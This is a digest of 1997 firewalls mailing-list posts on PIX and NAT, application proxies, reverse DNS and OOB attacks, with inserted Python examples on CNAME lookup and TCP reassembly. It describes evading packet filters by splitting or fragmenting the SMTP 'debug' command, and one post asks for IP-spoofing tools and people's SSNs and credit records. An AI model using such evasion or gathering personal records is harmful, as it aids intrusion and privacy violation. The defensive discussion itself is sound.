> > Workstations cannot ping network b
> > IP forwarding is enabled and my route print matches exactly the format of
> > Microsoft's recommendations.
> >
> > I really need to get this up and running. I would get you the route print,
> > but I cannot get the addresses to copy onto the clip board..duh :)
>
> Yeah, I think you better send us the output from netstat on both the
> 'router' and the workstations.
>
> Run netstat -rn from a DoZ window, click on the little Doz icon at the left
> of the title bar, select edit/mark, mark the stuff you want to send, copy
> it and paste it.
>
> David

From owner-firewalls-outgoing Fri Jun 6 03:50:33 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id AAA25483 for firewalls-outgoing; Fri, 6 Jun 1997 00:51:06 -0700 (PDT)
Received: from brussels.cisco.com (brussels.cisco.com [171.68.129.238]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id AAA25411 for ; Fri, 6 Jun 1997 00:50:40 -0700 (PDT)
Received: from cons-evyncke.cisco.com (brussels-ppp3.cisco.com [171.68.146.24]) by brussels.cisco.com (8.8.5/8.8.5) with SMTP id JAA26106; Fri, 6 Jun 1997 09:52:14 +0200 (METDST)
Message-Id: <3.0.32.19970606094942.006e0a64@brussels.cisco.com>
X-Sender: evyncke@brussels.cisco.com
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Fri, 06 Jun 1997 09:54:51 +0000
To: Craig Brozefsky , Bill Stout
From: Eric Vyncke
Subject: RE: PIX and Firewall-1
Cc: firewalls@GreatCircle.COM
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Craig,

Cannot resist replying :-) Beware that I'm working for Cisco Systems ;-)

At 10:47 5/06/97 -0500, Craig Brozefsky wrote:
>On Wed, 4 Jun 1997, Bill Stout wrote:
>
>> Peter Carlson writes....
>> >in what way are application level gateways more secure than, say, FW-1 or PIX?
>> >There are certainly capabilities that can be provided via application
>> >proxies that can't be provided by any filter-based technologies, but what
>> >types of attacks are a FW-1 or a PIX vulnerable to that application
>> >proxies aren't?
>
>You should check out comp.security.firewalls for a good
>discussion of these issues. PIX is a NAT capable router with a few
>filtering rules thrown in, such things are hardly safe, architecturally,
>and implementation wise. NAT is NOT, I repeat NOT! a security tool, and
>should not be treated as a part of your security infrastructure. Nearly
>all NAT tools are not designed with security in mind.
>

I both agree and disagree:

1) NAT is NOT a security feature, I agree thus 200% with you

2) but I agree at 0% with you when you say that PIX is just a NAT router with rules.
- PIX is not a router at all, it is not based on our IOS router software
- PIX is able to NAT but is not limited to NAT
- PIX is very strong due to its full-state inspection against attacks for IP, TCP, ... protocols: SYN flooding, IP spoofing, TCP/IP session hijacking, ... It also randomizes the TCP sequence numbers of the TCP sessions going through it
- PIX knows about the internals of some protocols (from ICMP, to RealAudio via HTTP) and is able to check / react on these protocols
- ...

I'm stopping now because it is getting too commercial on a technical list. But, once again: the PIX is a secure and performant component of most security architectures.

[snip...]

Best regards

Eric

Eric Vyncke
Technical Consultant
Cisco Systems Belgium SA/NV
Phone: +32-2-778.4677
Fax: +32-2-778.4300
E-mail: evyncke@cisco.com
Mobile: +32-75-312.458

From owner-firewalls-outgoing Fri Jun 6 04:02:35 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id BAA03779 for firewalls-outgoing; Fri, 6 Jun 1997 01:34:23 -0700 (PDT)
Received: from h01.scientia.com (h01.scientia.com [194.216.183.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id BAA03732 for ; Fri, 6 Jun 1997 01:34:10 -0700 (PDT)
Received: by h01.scientia.com with SMTP id JAA03645; Fri, 6 Jun 1997 09:38:13 +0100
Message-Id: <199706060838.JAA03645@h01.scientia.com>
X-Sender: firewall@pop-server
X-Mailer: Windows Eudora Light Version 1.5.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Fri, 06 Jun 1997 09:37:27 +0100
To: firewalls@greatcircle.com
From: Ian Miller
Subject: Re: Unknown log entry...
Cc: devin@TELERAMA.LM.COM "Tod McQuillin, as Technical Contact for zone LM.COM"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 19:05 05/06/97 -0700, Cihan Subasi wrote:
>I had those two lines in my firewall logs, can anybody explain to me what
>they are???
>
>--------------------------------------------------
>Jun 2 20:30:49 fw1 sendmail[16650]: gethostby*.getanswer: asked for
>"66.3.196.208.in-addr.arpa IN PTR", got type "CNAME"
>Jun 2 20:30:49 fw1 sendmail[16650]: gethostby*.getanswer: asked for
>"66.3.196.208.in-addr.arpa", got "66.64.3.196.208.in-addr.arpa"
>--------------------------------------------------

Your mail server has tried to do a reverse lookup on IP address 208.196.3.66 (karnov.lm.com) and has got some VERY odd results.

Reverse lookup on IP address ... is done by looking up domain ....in-addr.arpa. This should contain PTR (name->IP) records. However if you look up 208.196.3.66 you get:-

CNAME/ARPA "66.3.196.208.in-addr.arpa" 6h "66.64.3.196.208.in-addr.arpa"

CNAME records are name->name (alias) records. This is weird for an in-addr.arpa domain and it has, not surprisingly, confused your firewall. If you follow up the (I think non-sensical) CNAME you get:

PTR/ARPA "66.64.3.196.208.in-addr.arpa" 1d "karnov.lm.com"

I have no idea why this DNS is set up like this.
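As an added illustration (not part of Ian's post): a miniature resolver over record data constructed from the values quoted above, which follows the in-addr.arpa CNAME the way a full resolver does, plus a parser for the two sendmail warnings Cihan quoted, so the same log lines can be recognised and explained in future. A CNAME inside in-addr.arpa is the mechanism used for classless delegation of reverse zones smaller than a /24, which the older gethostby* code did not expect; the RECORDS table and all function names are this example's own.

```python
# Added example, not code from the firewalls list posts. The record table is
# constructed from the names quoted in the post; the log lines are copied from it.
import re
from typing import Dict, List, Optional, Tuple

# Constructed zone data: name -> list of (rrtype, rdata), taken from the post.
RECORDS: Dict[str, List[Tuple[str, str]]] = {
    "66.3.196.208.in-addr.arpa": [("CNAME", "66.64.3.196.208.in-addr.arpa")],
    "66.64.3.196.208.in-addr.arpa": [("PTR", "karnov.lm.com")],
}


def reverse_name(ip: str) -> str:
    """Build the in-addr.arpa query name for a dotted-quad IPv4 address."""
    octets = ip.split(".")
    if len(octets) != 4 or not all(o.isdigit() and 0 <= int(o) <= 255 for o in octets):
        raise ValueError(f"not an IPv4 address: {ip!r}")
    return ".".join(reversed(octets)) + ".in-addr.arpa"


def resolve_ptr(name: str, records=RECORDS, max_chain: int = 8):
    """Look up the PTR for `name`, following CNAMEs like a full resolver does.

    Returns (target_hostname_or_None, list_of_cnames_followed). A lookup that
    stops at the first answer sees only the CNAME and never reaches the PTR,
    which is exactly what the sendmail warning above complains about.
    """
    chain: List[str] = []
    current = name
    for _ in range(max_chain):
        rrset = records.get(current, [])
        ptrs = [rdata for rrtype, rdata in rrset if rrtype == "PTR"]
        if ptrs:
            return ptrs[0], chain
        cnames = [rdata for rrtype, rdata in rrset if rrtype == "CNAME"]
        if not cnames:
            return None, chain          # no data for this name
        chain.append(cnames[0])
        current = cnames[0]
    raise RuntimeError("CNAME chain too long (loop?)")


# Matches both warning forms quoted in the post.
_GETANSWER = re.compile(
    r'gethostby\*\.getanswer: asked for "(?P<asked>[^"]+)", got (?:type )?"(?P<got>[^"]+)"'
)


def parse_getanswer(line: str) -> Optional[Dict[str, str]]:
    """Extract name, query type and the unexpected answer from a getanswer warning."""
    m = _GETANSWER.search(line)
    if not m:
        return None
    name, _, qtype = m.group("asked").partition(" IN ")   # "x IN PTR" -> x, PTR
    return {"name": name, "qtype": qtype or "PTR", "got": m.group("got")}


# Log lines copied from the post.
LOG_LINES = [
    'Jun 2 20:30:49 fw1 sendmail[16650]: gethostby*.getanswer: asked for '
    '"66.3.196.208.in-addr.arpa IN PTR", got type "CNAME"',
    'Jun 2 20:30:49 fw1 sendmail[16650]: gethostby*.getanswer: asked for '
    '"66.3.196.208.in-addr.arpa", got "66.64.3.196.208.in-addr.arpa"',
]


def explain(log_lines=LOG_LINES, records=RECORDS) -> List[str]:
    """For each warning, show what a CNAME-following lookup would have returned."""
    out = []
    for line in log_lines:
        parsed = parse_getanswer(line)
        if parsed is None:
            continue
        host, chain = resolve_ptr(parsed["name"], records)
        out.append(" -> ".join([parsed["name"], *chain, str(host)]))
    return out


if __name__ == "__main__":
    for s in explain():
        print(s)
```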
Ian

From owner-firewalls-outgoing Fri Jun 6 04:46:28 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id DAA25369 for firewalls-outgoing; Fri, 6 Jun 1997 03:28:09 -0700 (PDT)
Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id DAA23520 for ; Fri, 6 Jun 1997 03:18:52 -0700 (PDT)
Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.4/8.8.4) with ESMTP id DAA25165; Fri, 6 Jun 1997 03:22:37 -0700 (PDT)
Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id DAA16305; Fri, 6 Jun 1997 03:22:36 -0700 (PDT)
Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id DAA07719; Fri, 6 Jun 1997 03:22:34 -0700 (PDT)
From: Don Lewis
Message-Id: <199706061022.DAA07719@salsa.gv.tsc.tdk.com>
Date: Fri, 6 Jun 1997 03:22:34 -0700
In-Reply-To: Cy Ardoin "Re: PIX and FW-1 (packet filter Question)" (Jun 5, 2:11pm)
X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95)
To: Cy Ardoin , "Jonathan M. Bresler"
Subject: Re: PIX and FW-1 (packet filter Question)
Cc: Firewalls@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Jun 5, 2:11pm, Cy Ardoin wrote:
} Subject: Re: PIX and FW-1 (packet filter Question)
} On Thu, 5 Jun 1997, Jonathan M. Bresler wrote:
}
} >
} > >I don't think there is anything an application firewall can
} > >do that can't also be done by a "packet filter" firewall. The
} >
} > trivial example:
} > a smtp application level proxy can disable the "debug" command
} > for every sendmail behind that firewall.
}
} Finding and removing the "debug" command from smtp connections at the
} packet layer isn't much different than finding and altering the PORT and
} PASV part of the FTP command and all the NAT style packet filters
} modify the FTP commands.
} It's not something packet filters do, but
} it is no more difficult than many of the things they already do.

What if each character in "debug" is sent in a separate TCP segment? What if the segments are sent out of order? What if "debug" is part of one TCP segment that is fragmented with overlapping fragments such that you don't see "debug" until the fragments are reassembled in a certain way? And don't forget, you need to keep track of the entire state of the SMTP connection, so that you don't drop the connection because "debug" is in the text of the message.

The reassembly and reordering is done by the TCP stack in an application proxy firewall, so the application proxy and the destination mail server will see the same cleaned-up datastream.

I seem to recall that the FW-1 ftp command stream rewriting broke if the packet boundaries happened to occur in inconvenient places (I believe they fixed this a while ago). If you're just relying on your firewall to rewrite your ftp commands, then about the worst thing a hostile ftp client could do is just not work. If you're relying on your firewall to sanitize incoming data streams, then any failures to accurately track the connection state could result in a security breach.

In principle, a stateful packet filter and an application proxy can do the same thing, but it would take a very large number of states to duplicate what the network stack does with input packets. Even if your packet filter implements an equivalent state machine, there is the danger that the destination host works in an unexpected way that still leaves it vulnerable.

Probably the easiest and safest thing the packet filter can do is to throw away fragmented packets and out of order TCP segments, but I suspect that violates some of the "should" and "must" clauses in the RFCs.
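As an added example (not from Don's post, and not FW-1 or any product's code): the two points above in working form, reassembling out-of-order TCP segments into the byte stream the receiving host will see before inspecting it, and tracking SMTP's DATA phase so that "debug" inside a message body is not mistaken for the DEBUG command. The segments, sequence numbers and SMTP dialogue are constructed; the per-segment check is included only to contrast with the reassembled one.

```python
# Added example, not code from the firewalls list posts or from any firewall
# product. Segments, ISN and the SMTP dialogue below are constructed.
from typing import Iterable, List, Tuple

Segment = Tuple[int, bytes]   # (TCP sequence number, payload)


def reassemble(segments: Iterable[Segment], isn: int) -> bytes:
    """Order segments by sequence number and glue them into one byte stream.

    Overlapping bytes go to the segment delivered first, and a gap truncates
    the stream at the hole, since a receiver cannot hand the application
    anything past missing data. This is the view an application proxy gets
    from its own TCP stack, as opposed to the per-packet view of a filter.
    """
    buf = bytearray()
    have = bytearray()            # 1 where that offset is already filled
    for seq, data in segments:
        off = seq - isn
        if off < 0 or not data:
            continue
        need = off + len(data)
        if need > len(buf):
            buf.extend(b"\0" * (need - len(buf)))
            have.extend(b"\0" * (need - len(have)))
        for i, b in enumerate(data):
            if not have[off + i]:  # first delivered wins on overlap
                buf[off + i] = b
                have[off + i] = 1
    try:
        end = have.index(0)       # stop at the first hole
    except ValueError:
        end = len(buf)
    return bytes(buf[:end])


def per_segment_match(segments: Iterable[Segment], needle: bytes) -> bool:
    """The naive filter: look for the token inside each segment on its own."""
    return any(needle in data for _, data in segments)


def smtp_commands(stream: bytes) -> List[str]:
    """Return the SMTP verbs seen in command phase; the DATA body is skipped."""
    verbs, in_data = [], False
    for raw in stream.split(b"\r\n"):
        line = raw.decode("ascii", "replace")
        if in_data:
            if line == ".":       # end-of-message terminator
                in_data = False
            continue
        verb = line.split(" ", 1)[0].upper()
        if verb:
            verbs.append(verb)
        if verb == "DATA":
            in_data = True
    return verbs


def stream_has_command(segments: Iterable[Segment], isn: int, verb: str = "DEBUG") -> bool:
    """Reassemble first, then inspect the command stream with SMTP state tracked."""
    return verb.upper() in smtp_commands(reassemble(segments, isn))


def split_by_char(data: bytes, start: int, chunk: int = 1) -> List[Segment]:
    """Cut a byte string into `chunk`-byte segments starting at sequence `start`."""
    return [(start + i, data[i:i + chunk]) for i in range(0, len(data), chunk)]


# Constructed client->server dialogue: "debug" appears in the message body
# (harmless) and once more as a real command after the body terminator.
ISN = 1000
CLIENT = (b"HELO mail.example.test\r\nMAIL FROM:<a@example.test>\r\n"
          b"RCPT TO:<b@example.test>\r\nDATA\r\nplease enable debug\r\n.\r\n"
          b"debug\r\nQUIT\r\n")

# Constructed delivery order: one byte per segment, arriving in reverse.
ONE_BYTE_REVERSED = list(reversed(split_by_char(CLIENT, ISN)))

if __name__ == "__main__":
    print("per-segment match:", per_segment_match(ONE_BYTE_REVERSED, b"debug"))
    print("after reassembly: ", stream_has_command(ONE_BYTE_REVERSED, ISN))
```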
--- Truck

From owner-firewalls-outgoing Fri Jun 6 05:01:01 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id DAA02834 for firewalls-outgoing; Fri, 6 Jun 1997 03:56:48 -0700 (PDT)
Received: from proxy.src.siemens.es (ms1.src.siemens.es [195.53.72.4]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id DAA02796 for ; Fri, 6 Jun 1997 03:56:34 -0700 (PDT)
Received: from cceballos.src.siemens.es by proxy.src.siemens.es with SMTP (Microsoft Exchange Internet Mail Service Version 5.0.1457.7) id LG9HY3VF; Fri, 6 Jun 1997 13:04:17 +0200
Message-ID: <3397EF0A.68E1@iponet.es>
Date: Fri, 06 Jun 1997 13:05:46 +0200
From: Cristina Ceballos
Reply-To: cceballos@src.siemens.es
Organization: Siemens Redes Corporativas
X-Mailer: Mozilla 3.0Gold (Win95; I)
MIME-Version: 1.0
To: firewalls@greatcircle.com
Subject: SecuRemote on FireWall-1 3.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello,

I am trying to use SecuRemote to access the internal network from the Internet in an encrypted manner. In order to do that I have to install the SecuRemote client on the PC accessing my network from the Internet and also, on the server side, SecuRemote is implemented on top of a Firewall-1 Virtual Private Network.

My questions are:

Is a Virtual Private Network just an object (network type) I have to define????

Do I need to have a Certified Key in order to be able to use this encryption???? (I shouldn't..)

If anyone is using SecuRemote I would appreciate your help.

Thanks.
Cristina Ceballos
--

From owner-firewalls-outgoing Fri Jun 6 05:52:37 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id QAA21243 for firewalls-outgoing; Thu, 5 Jun 1997 16:39:52 -0700 (PDT)
Received: from pctb.industryone.net ([208.135.121.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id QAA21204 for ; Thu, 5 Jun 1997 16:39:40 -0700 (PDT)
Received: from [206.114.39.33] by pctb.industryone.net (SMTPD32-3.03) id AEF765C011E; Thu, 05 Jun 1997 19:42:47 -0400
Message-ID: <339FE10D.7AB3@Who.net>
Date: Thu, 12 Jun 1997 07:44:13 -0400
From: -= TaLoN =-
Reply-To: Talon@Who.net
Organization: CVI SOFTWARE
X-Mailer: Mozilla 3.0 (Win95; I)
MIME-Version: 1.0
To: firewalls@greatcircle.com
Subject: IP SPOOFING
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Okay, I'm pretty new to investigative services with Internet Service Providers but what I'm mainly interested in would be information related to faking / spoofing IP addresses & network nodes. If anyone out there has any information related to that or even information or software which allows one to do that, please send it to me at Talon@who.net .

Also, looking for assistance in finding information on people. (i.e. SSN, CREDIT RECORDS, ETC.) Please email me AS SOON as you get any information.

Thanks!
Once Again, please email me : Talon@mail.org

Jason Burton - Certified Network Investigator
Vector Classified Section

From owner-firewalls-outgoing Fri Jun 6 05:58:36 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id SAA13382 for firewalls-outgoing; Thu, 5 Jun 1997 18:37:38 -0700 (PDT)
Received: from mail.clark.net (mail.clark.net [168.143.0.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id SAA13328 for ; Thu, 5 Jun 1997 18:37:18 -0700 (PDT)
Received: from mjr.clark.net (mjr.clark.net [168.143.19.61]) by mail.clark.net (8.8.5/8.6.5) with SMTP id VAA24079 for ; Thu, 5 Jun 1997 21:40:46 -0400 (EDT)
Message-Id: <199706060140.VAA24079@mail.clark.net>
Comments: Authenticated sender is
From: "Marcus J. Ranum"
Organization: Network Flight Recorder, Inc.
To: Firewalls@GreatCircle.COM
Date: Thu, 5 Jun 1997 21:39:18 +0000
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Subject: Re: Fortezza's Fate??
Reply-to: mjr@clark.net
In-reply-to: <199706051957.MAA15686@honor.greatcircle.com>
X-mailer: Pegasus Mail for Win32 (v2.53/R1)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> There are a lot of rumors buzzing around DC these days to the
> effect that NSA and the Joint Chiefs have tossed in the towel and will,
> within weeks, approve DoD purchases for non-Fortezza security systems, for
> both strong authentication

Wow!! I bet that's gonna really do wonders for all your Security Dynamics stock options, Vin! Congrats!!

mjr.
-----
Marcus J. Ranum, CEO, Network Flight Recorder, Inc.
Personal Work New Book!!
From owner-firewalls-outgoing Fri Jun 6 06:01:43 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id EAA08832 for firewalls-outgoing; Fri, 6 Jun 1997 04:27:57 -0700 (PDT)
Received: from namsa.nato.int (ddnfw0.namsa.nato.int [147.36.201.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id DAA01385 for ; Fri, 6 Jun 1997 03:48:44 -0700 (PDT)
Received: by ddnfw0.namsa.nato.int id <17033-1>; Fri, 6 Jun 1997 12:53:12 +0100
Message-Id: <97Jun6.125312gmt+0100.17033-1@ddnfw0.namsa.nato.int>
Date: Fri, 6 Jun 1997 11:53:36 +0100
From: Thierry GUINET
X-Mailer: Mozilla 3.0 (X11; I; HP-UX A.09.05 9000/735)
Mime-Version: 1.0
To: Robert Ståhlbrand
Cc: firewalls@GreatCircle.COM
Subject: Re: [FW1] Out of Band Data Attack against NT-Hosts
References: <43BED8177D10D011A69A0800092C15D7011BFD@haig.oplab.nmac.ericsson.se>
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Robert Ståhlbrand wrote:
>
> What is the problem here???
> Of course (as Mike Hedlund says) an NT machine (Win95 and Win3.11 as
> well) is only vulnerable to the OOB bug on port 139 (NetBIOS), and I REALLY

I hope I'm making a false assertion, but I think you're wrong. I read that some tests have been done, using the urgent flag against port 80, and that it worked just fine :( I don't have the paper in front of me but if you're interested I can dig into my archives.

Thierry
--
Thierry Guinet
T.Guinet@namsa.nato.int
Phone: +352/30.63-6812
Fax: +352/30.87.21

In order to create an apple pie from scratch, you must first create the universe.
Carl Sagan

From owner-firewalls-outgoing Fri Jun 6 06:01:48 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id TAA18424 for firewalls-outgoing; Thu, 5 Jun 1997 19:03:12 -0700 (PDT)
Received: from m4.nassau.cv.net (m4.nassau.cv.net [167.206.32.6]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id TAA18360 for ; Thu, 5 Jun 1997 19:02:51 -0700 (PDT)
Received: from m5.nassau.cv.net by m4.nassau.cv.net with ESMTP (1.40.112.8/16.2) id AA199602806; Thu, 5 Jun 1997 22:06:46 -0400
Received: from nassau.cv.net.nassau.cv.net ([10.4.55.84]) by m5.nassau.cv.net with SMTP (1.40.112.8/16.2) id AA191992804; Thu, 5 Jun 1997 22:06:44 -0400
Message-Id: <3.0.1.16.19970605220043.356f0950@mail-hub>
X-Sender: kgunther@mail-hub
X-Mailer: Windows Eudora Light Version 3.0.1 (16)
Date: Thu, 05 Jun 1997 22:00:43 -0400
To: firewalls@GreatCircle.COM
From: Ken Gunther
Subject: Does Winframe need a firewall?
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

We are currently using Winframe by Citrix to give remote users access to applications at our datacenter. Access to the Winframe box is through the IBM Global Network (IGN). IGN is a subscribers-only network. It is not as open as the Internet but by no means do we have control over who is on it.

We currently have a firewall in front of the Winframe box but there is a noticeable delay in keystrokes when going through the firewall (TIS Toolkit on a Linux box). We have performed some tests where for short periods of time the Winframe box was connected directly to the IGN and the keystroke delays went away.

Is Winframe safe to put directly on the untrusted network? We are worried about unauthorized people getting through to the trusted side as well as denial of service attacks where people try to crash Winframe.
Ken (kgunther@nassau.cv.net)

From owner-firewalls-outgoing Fri Jun 6 06:54:18 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id AAA25482 for firewalls-outgoing; Fri, 6 Jun 1997 00:51:03 -0700 (PDT)
Received: from brussels.cisco.com (brussels.cisco.com [171.68.129.238]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id AAA25385 for ; Fri, 6 Jun 1997 00:50:35 -0700 (PDT)
Received: from cons-evyncke.cisco.com (brussels-ppp3.cisco.com [171.68.146.24]) by brussels.cisco.com (8.8.5/8.8.5) with SMTP id JAA26103; Fri, 6 Jun 1997 09:52:11 +0200 (METDST)
Message-Id: <3.0.32.19970606094235.006df76c@brussels.cisco.com>
X-Sender: evyncke@brussels.cisco.com
X-Mailer: Windows Eudora Pro Version 3.0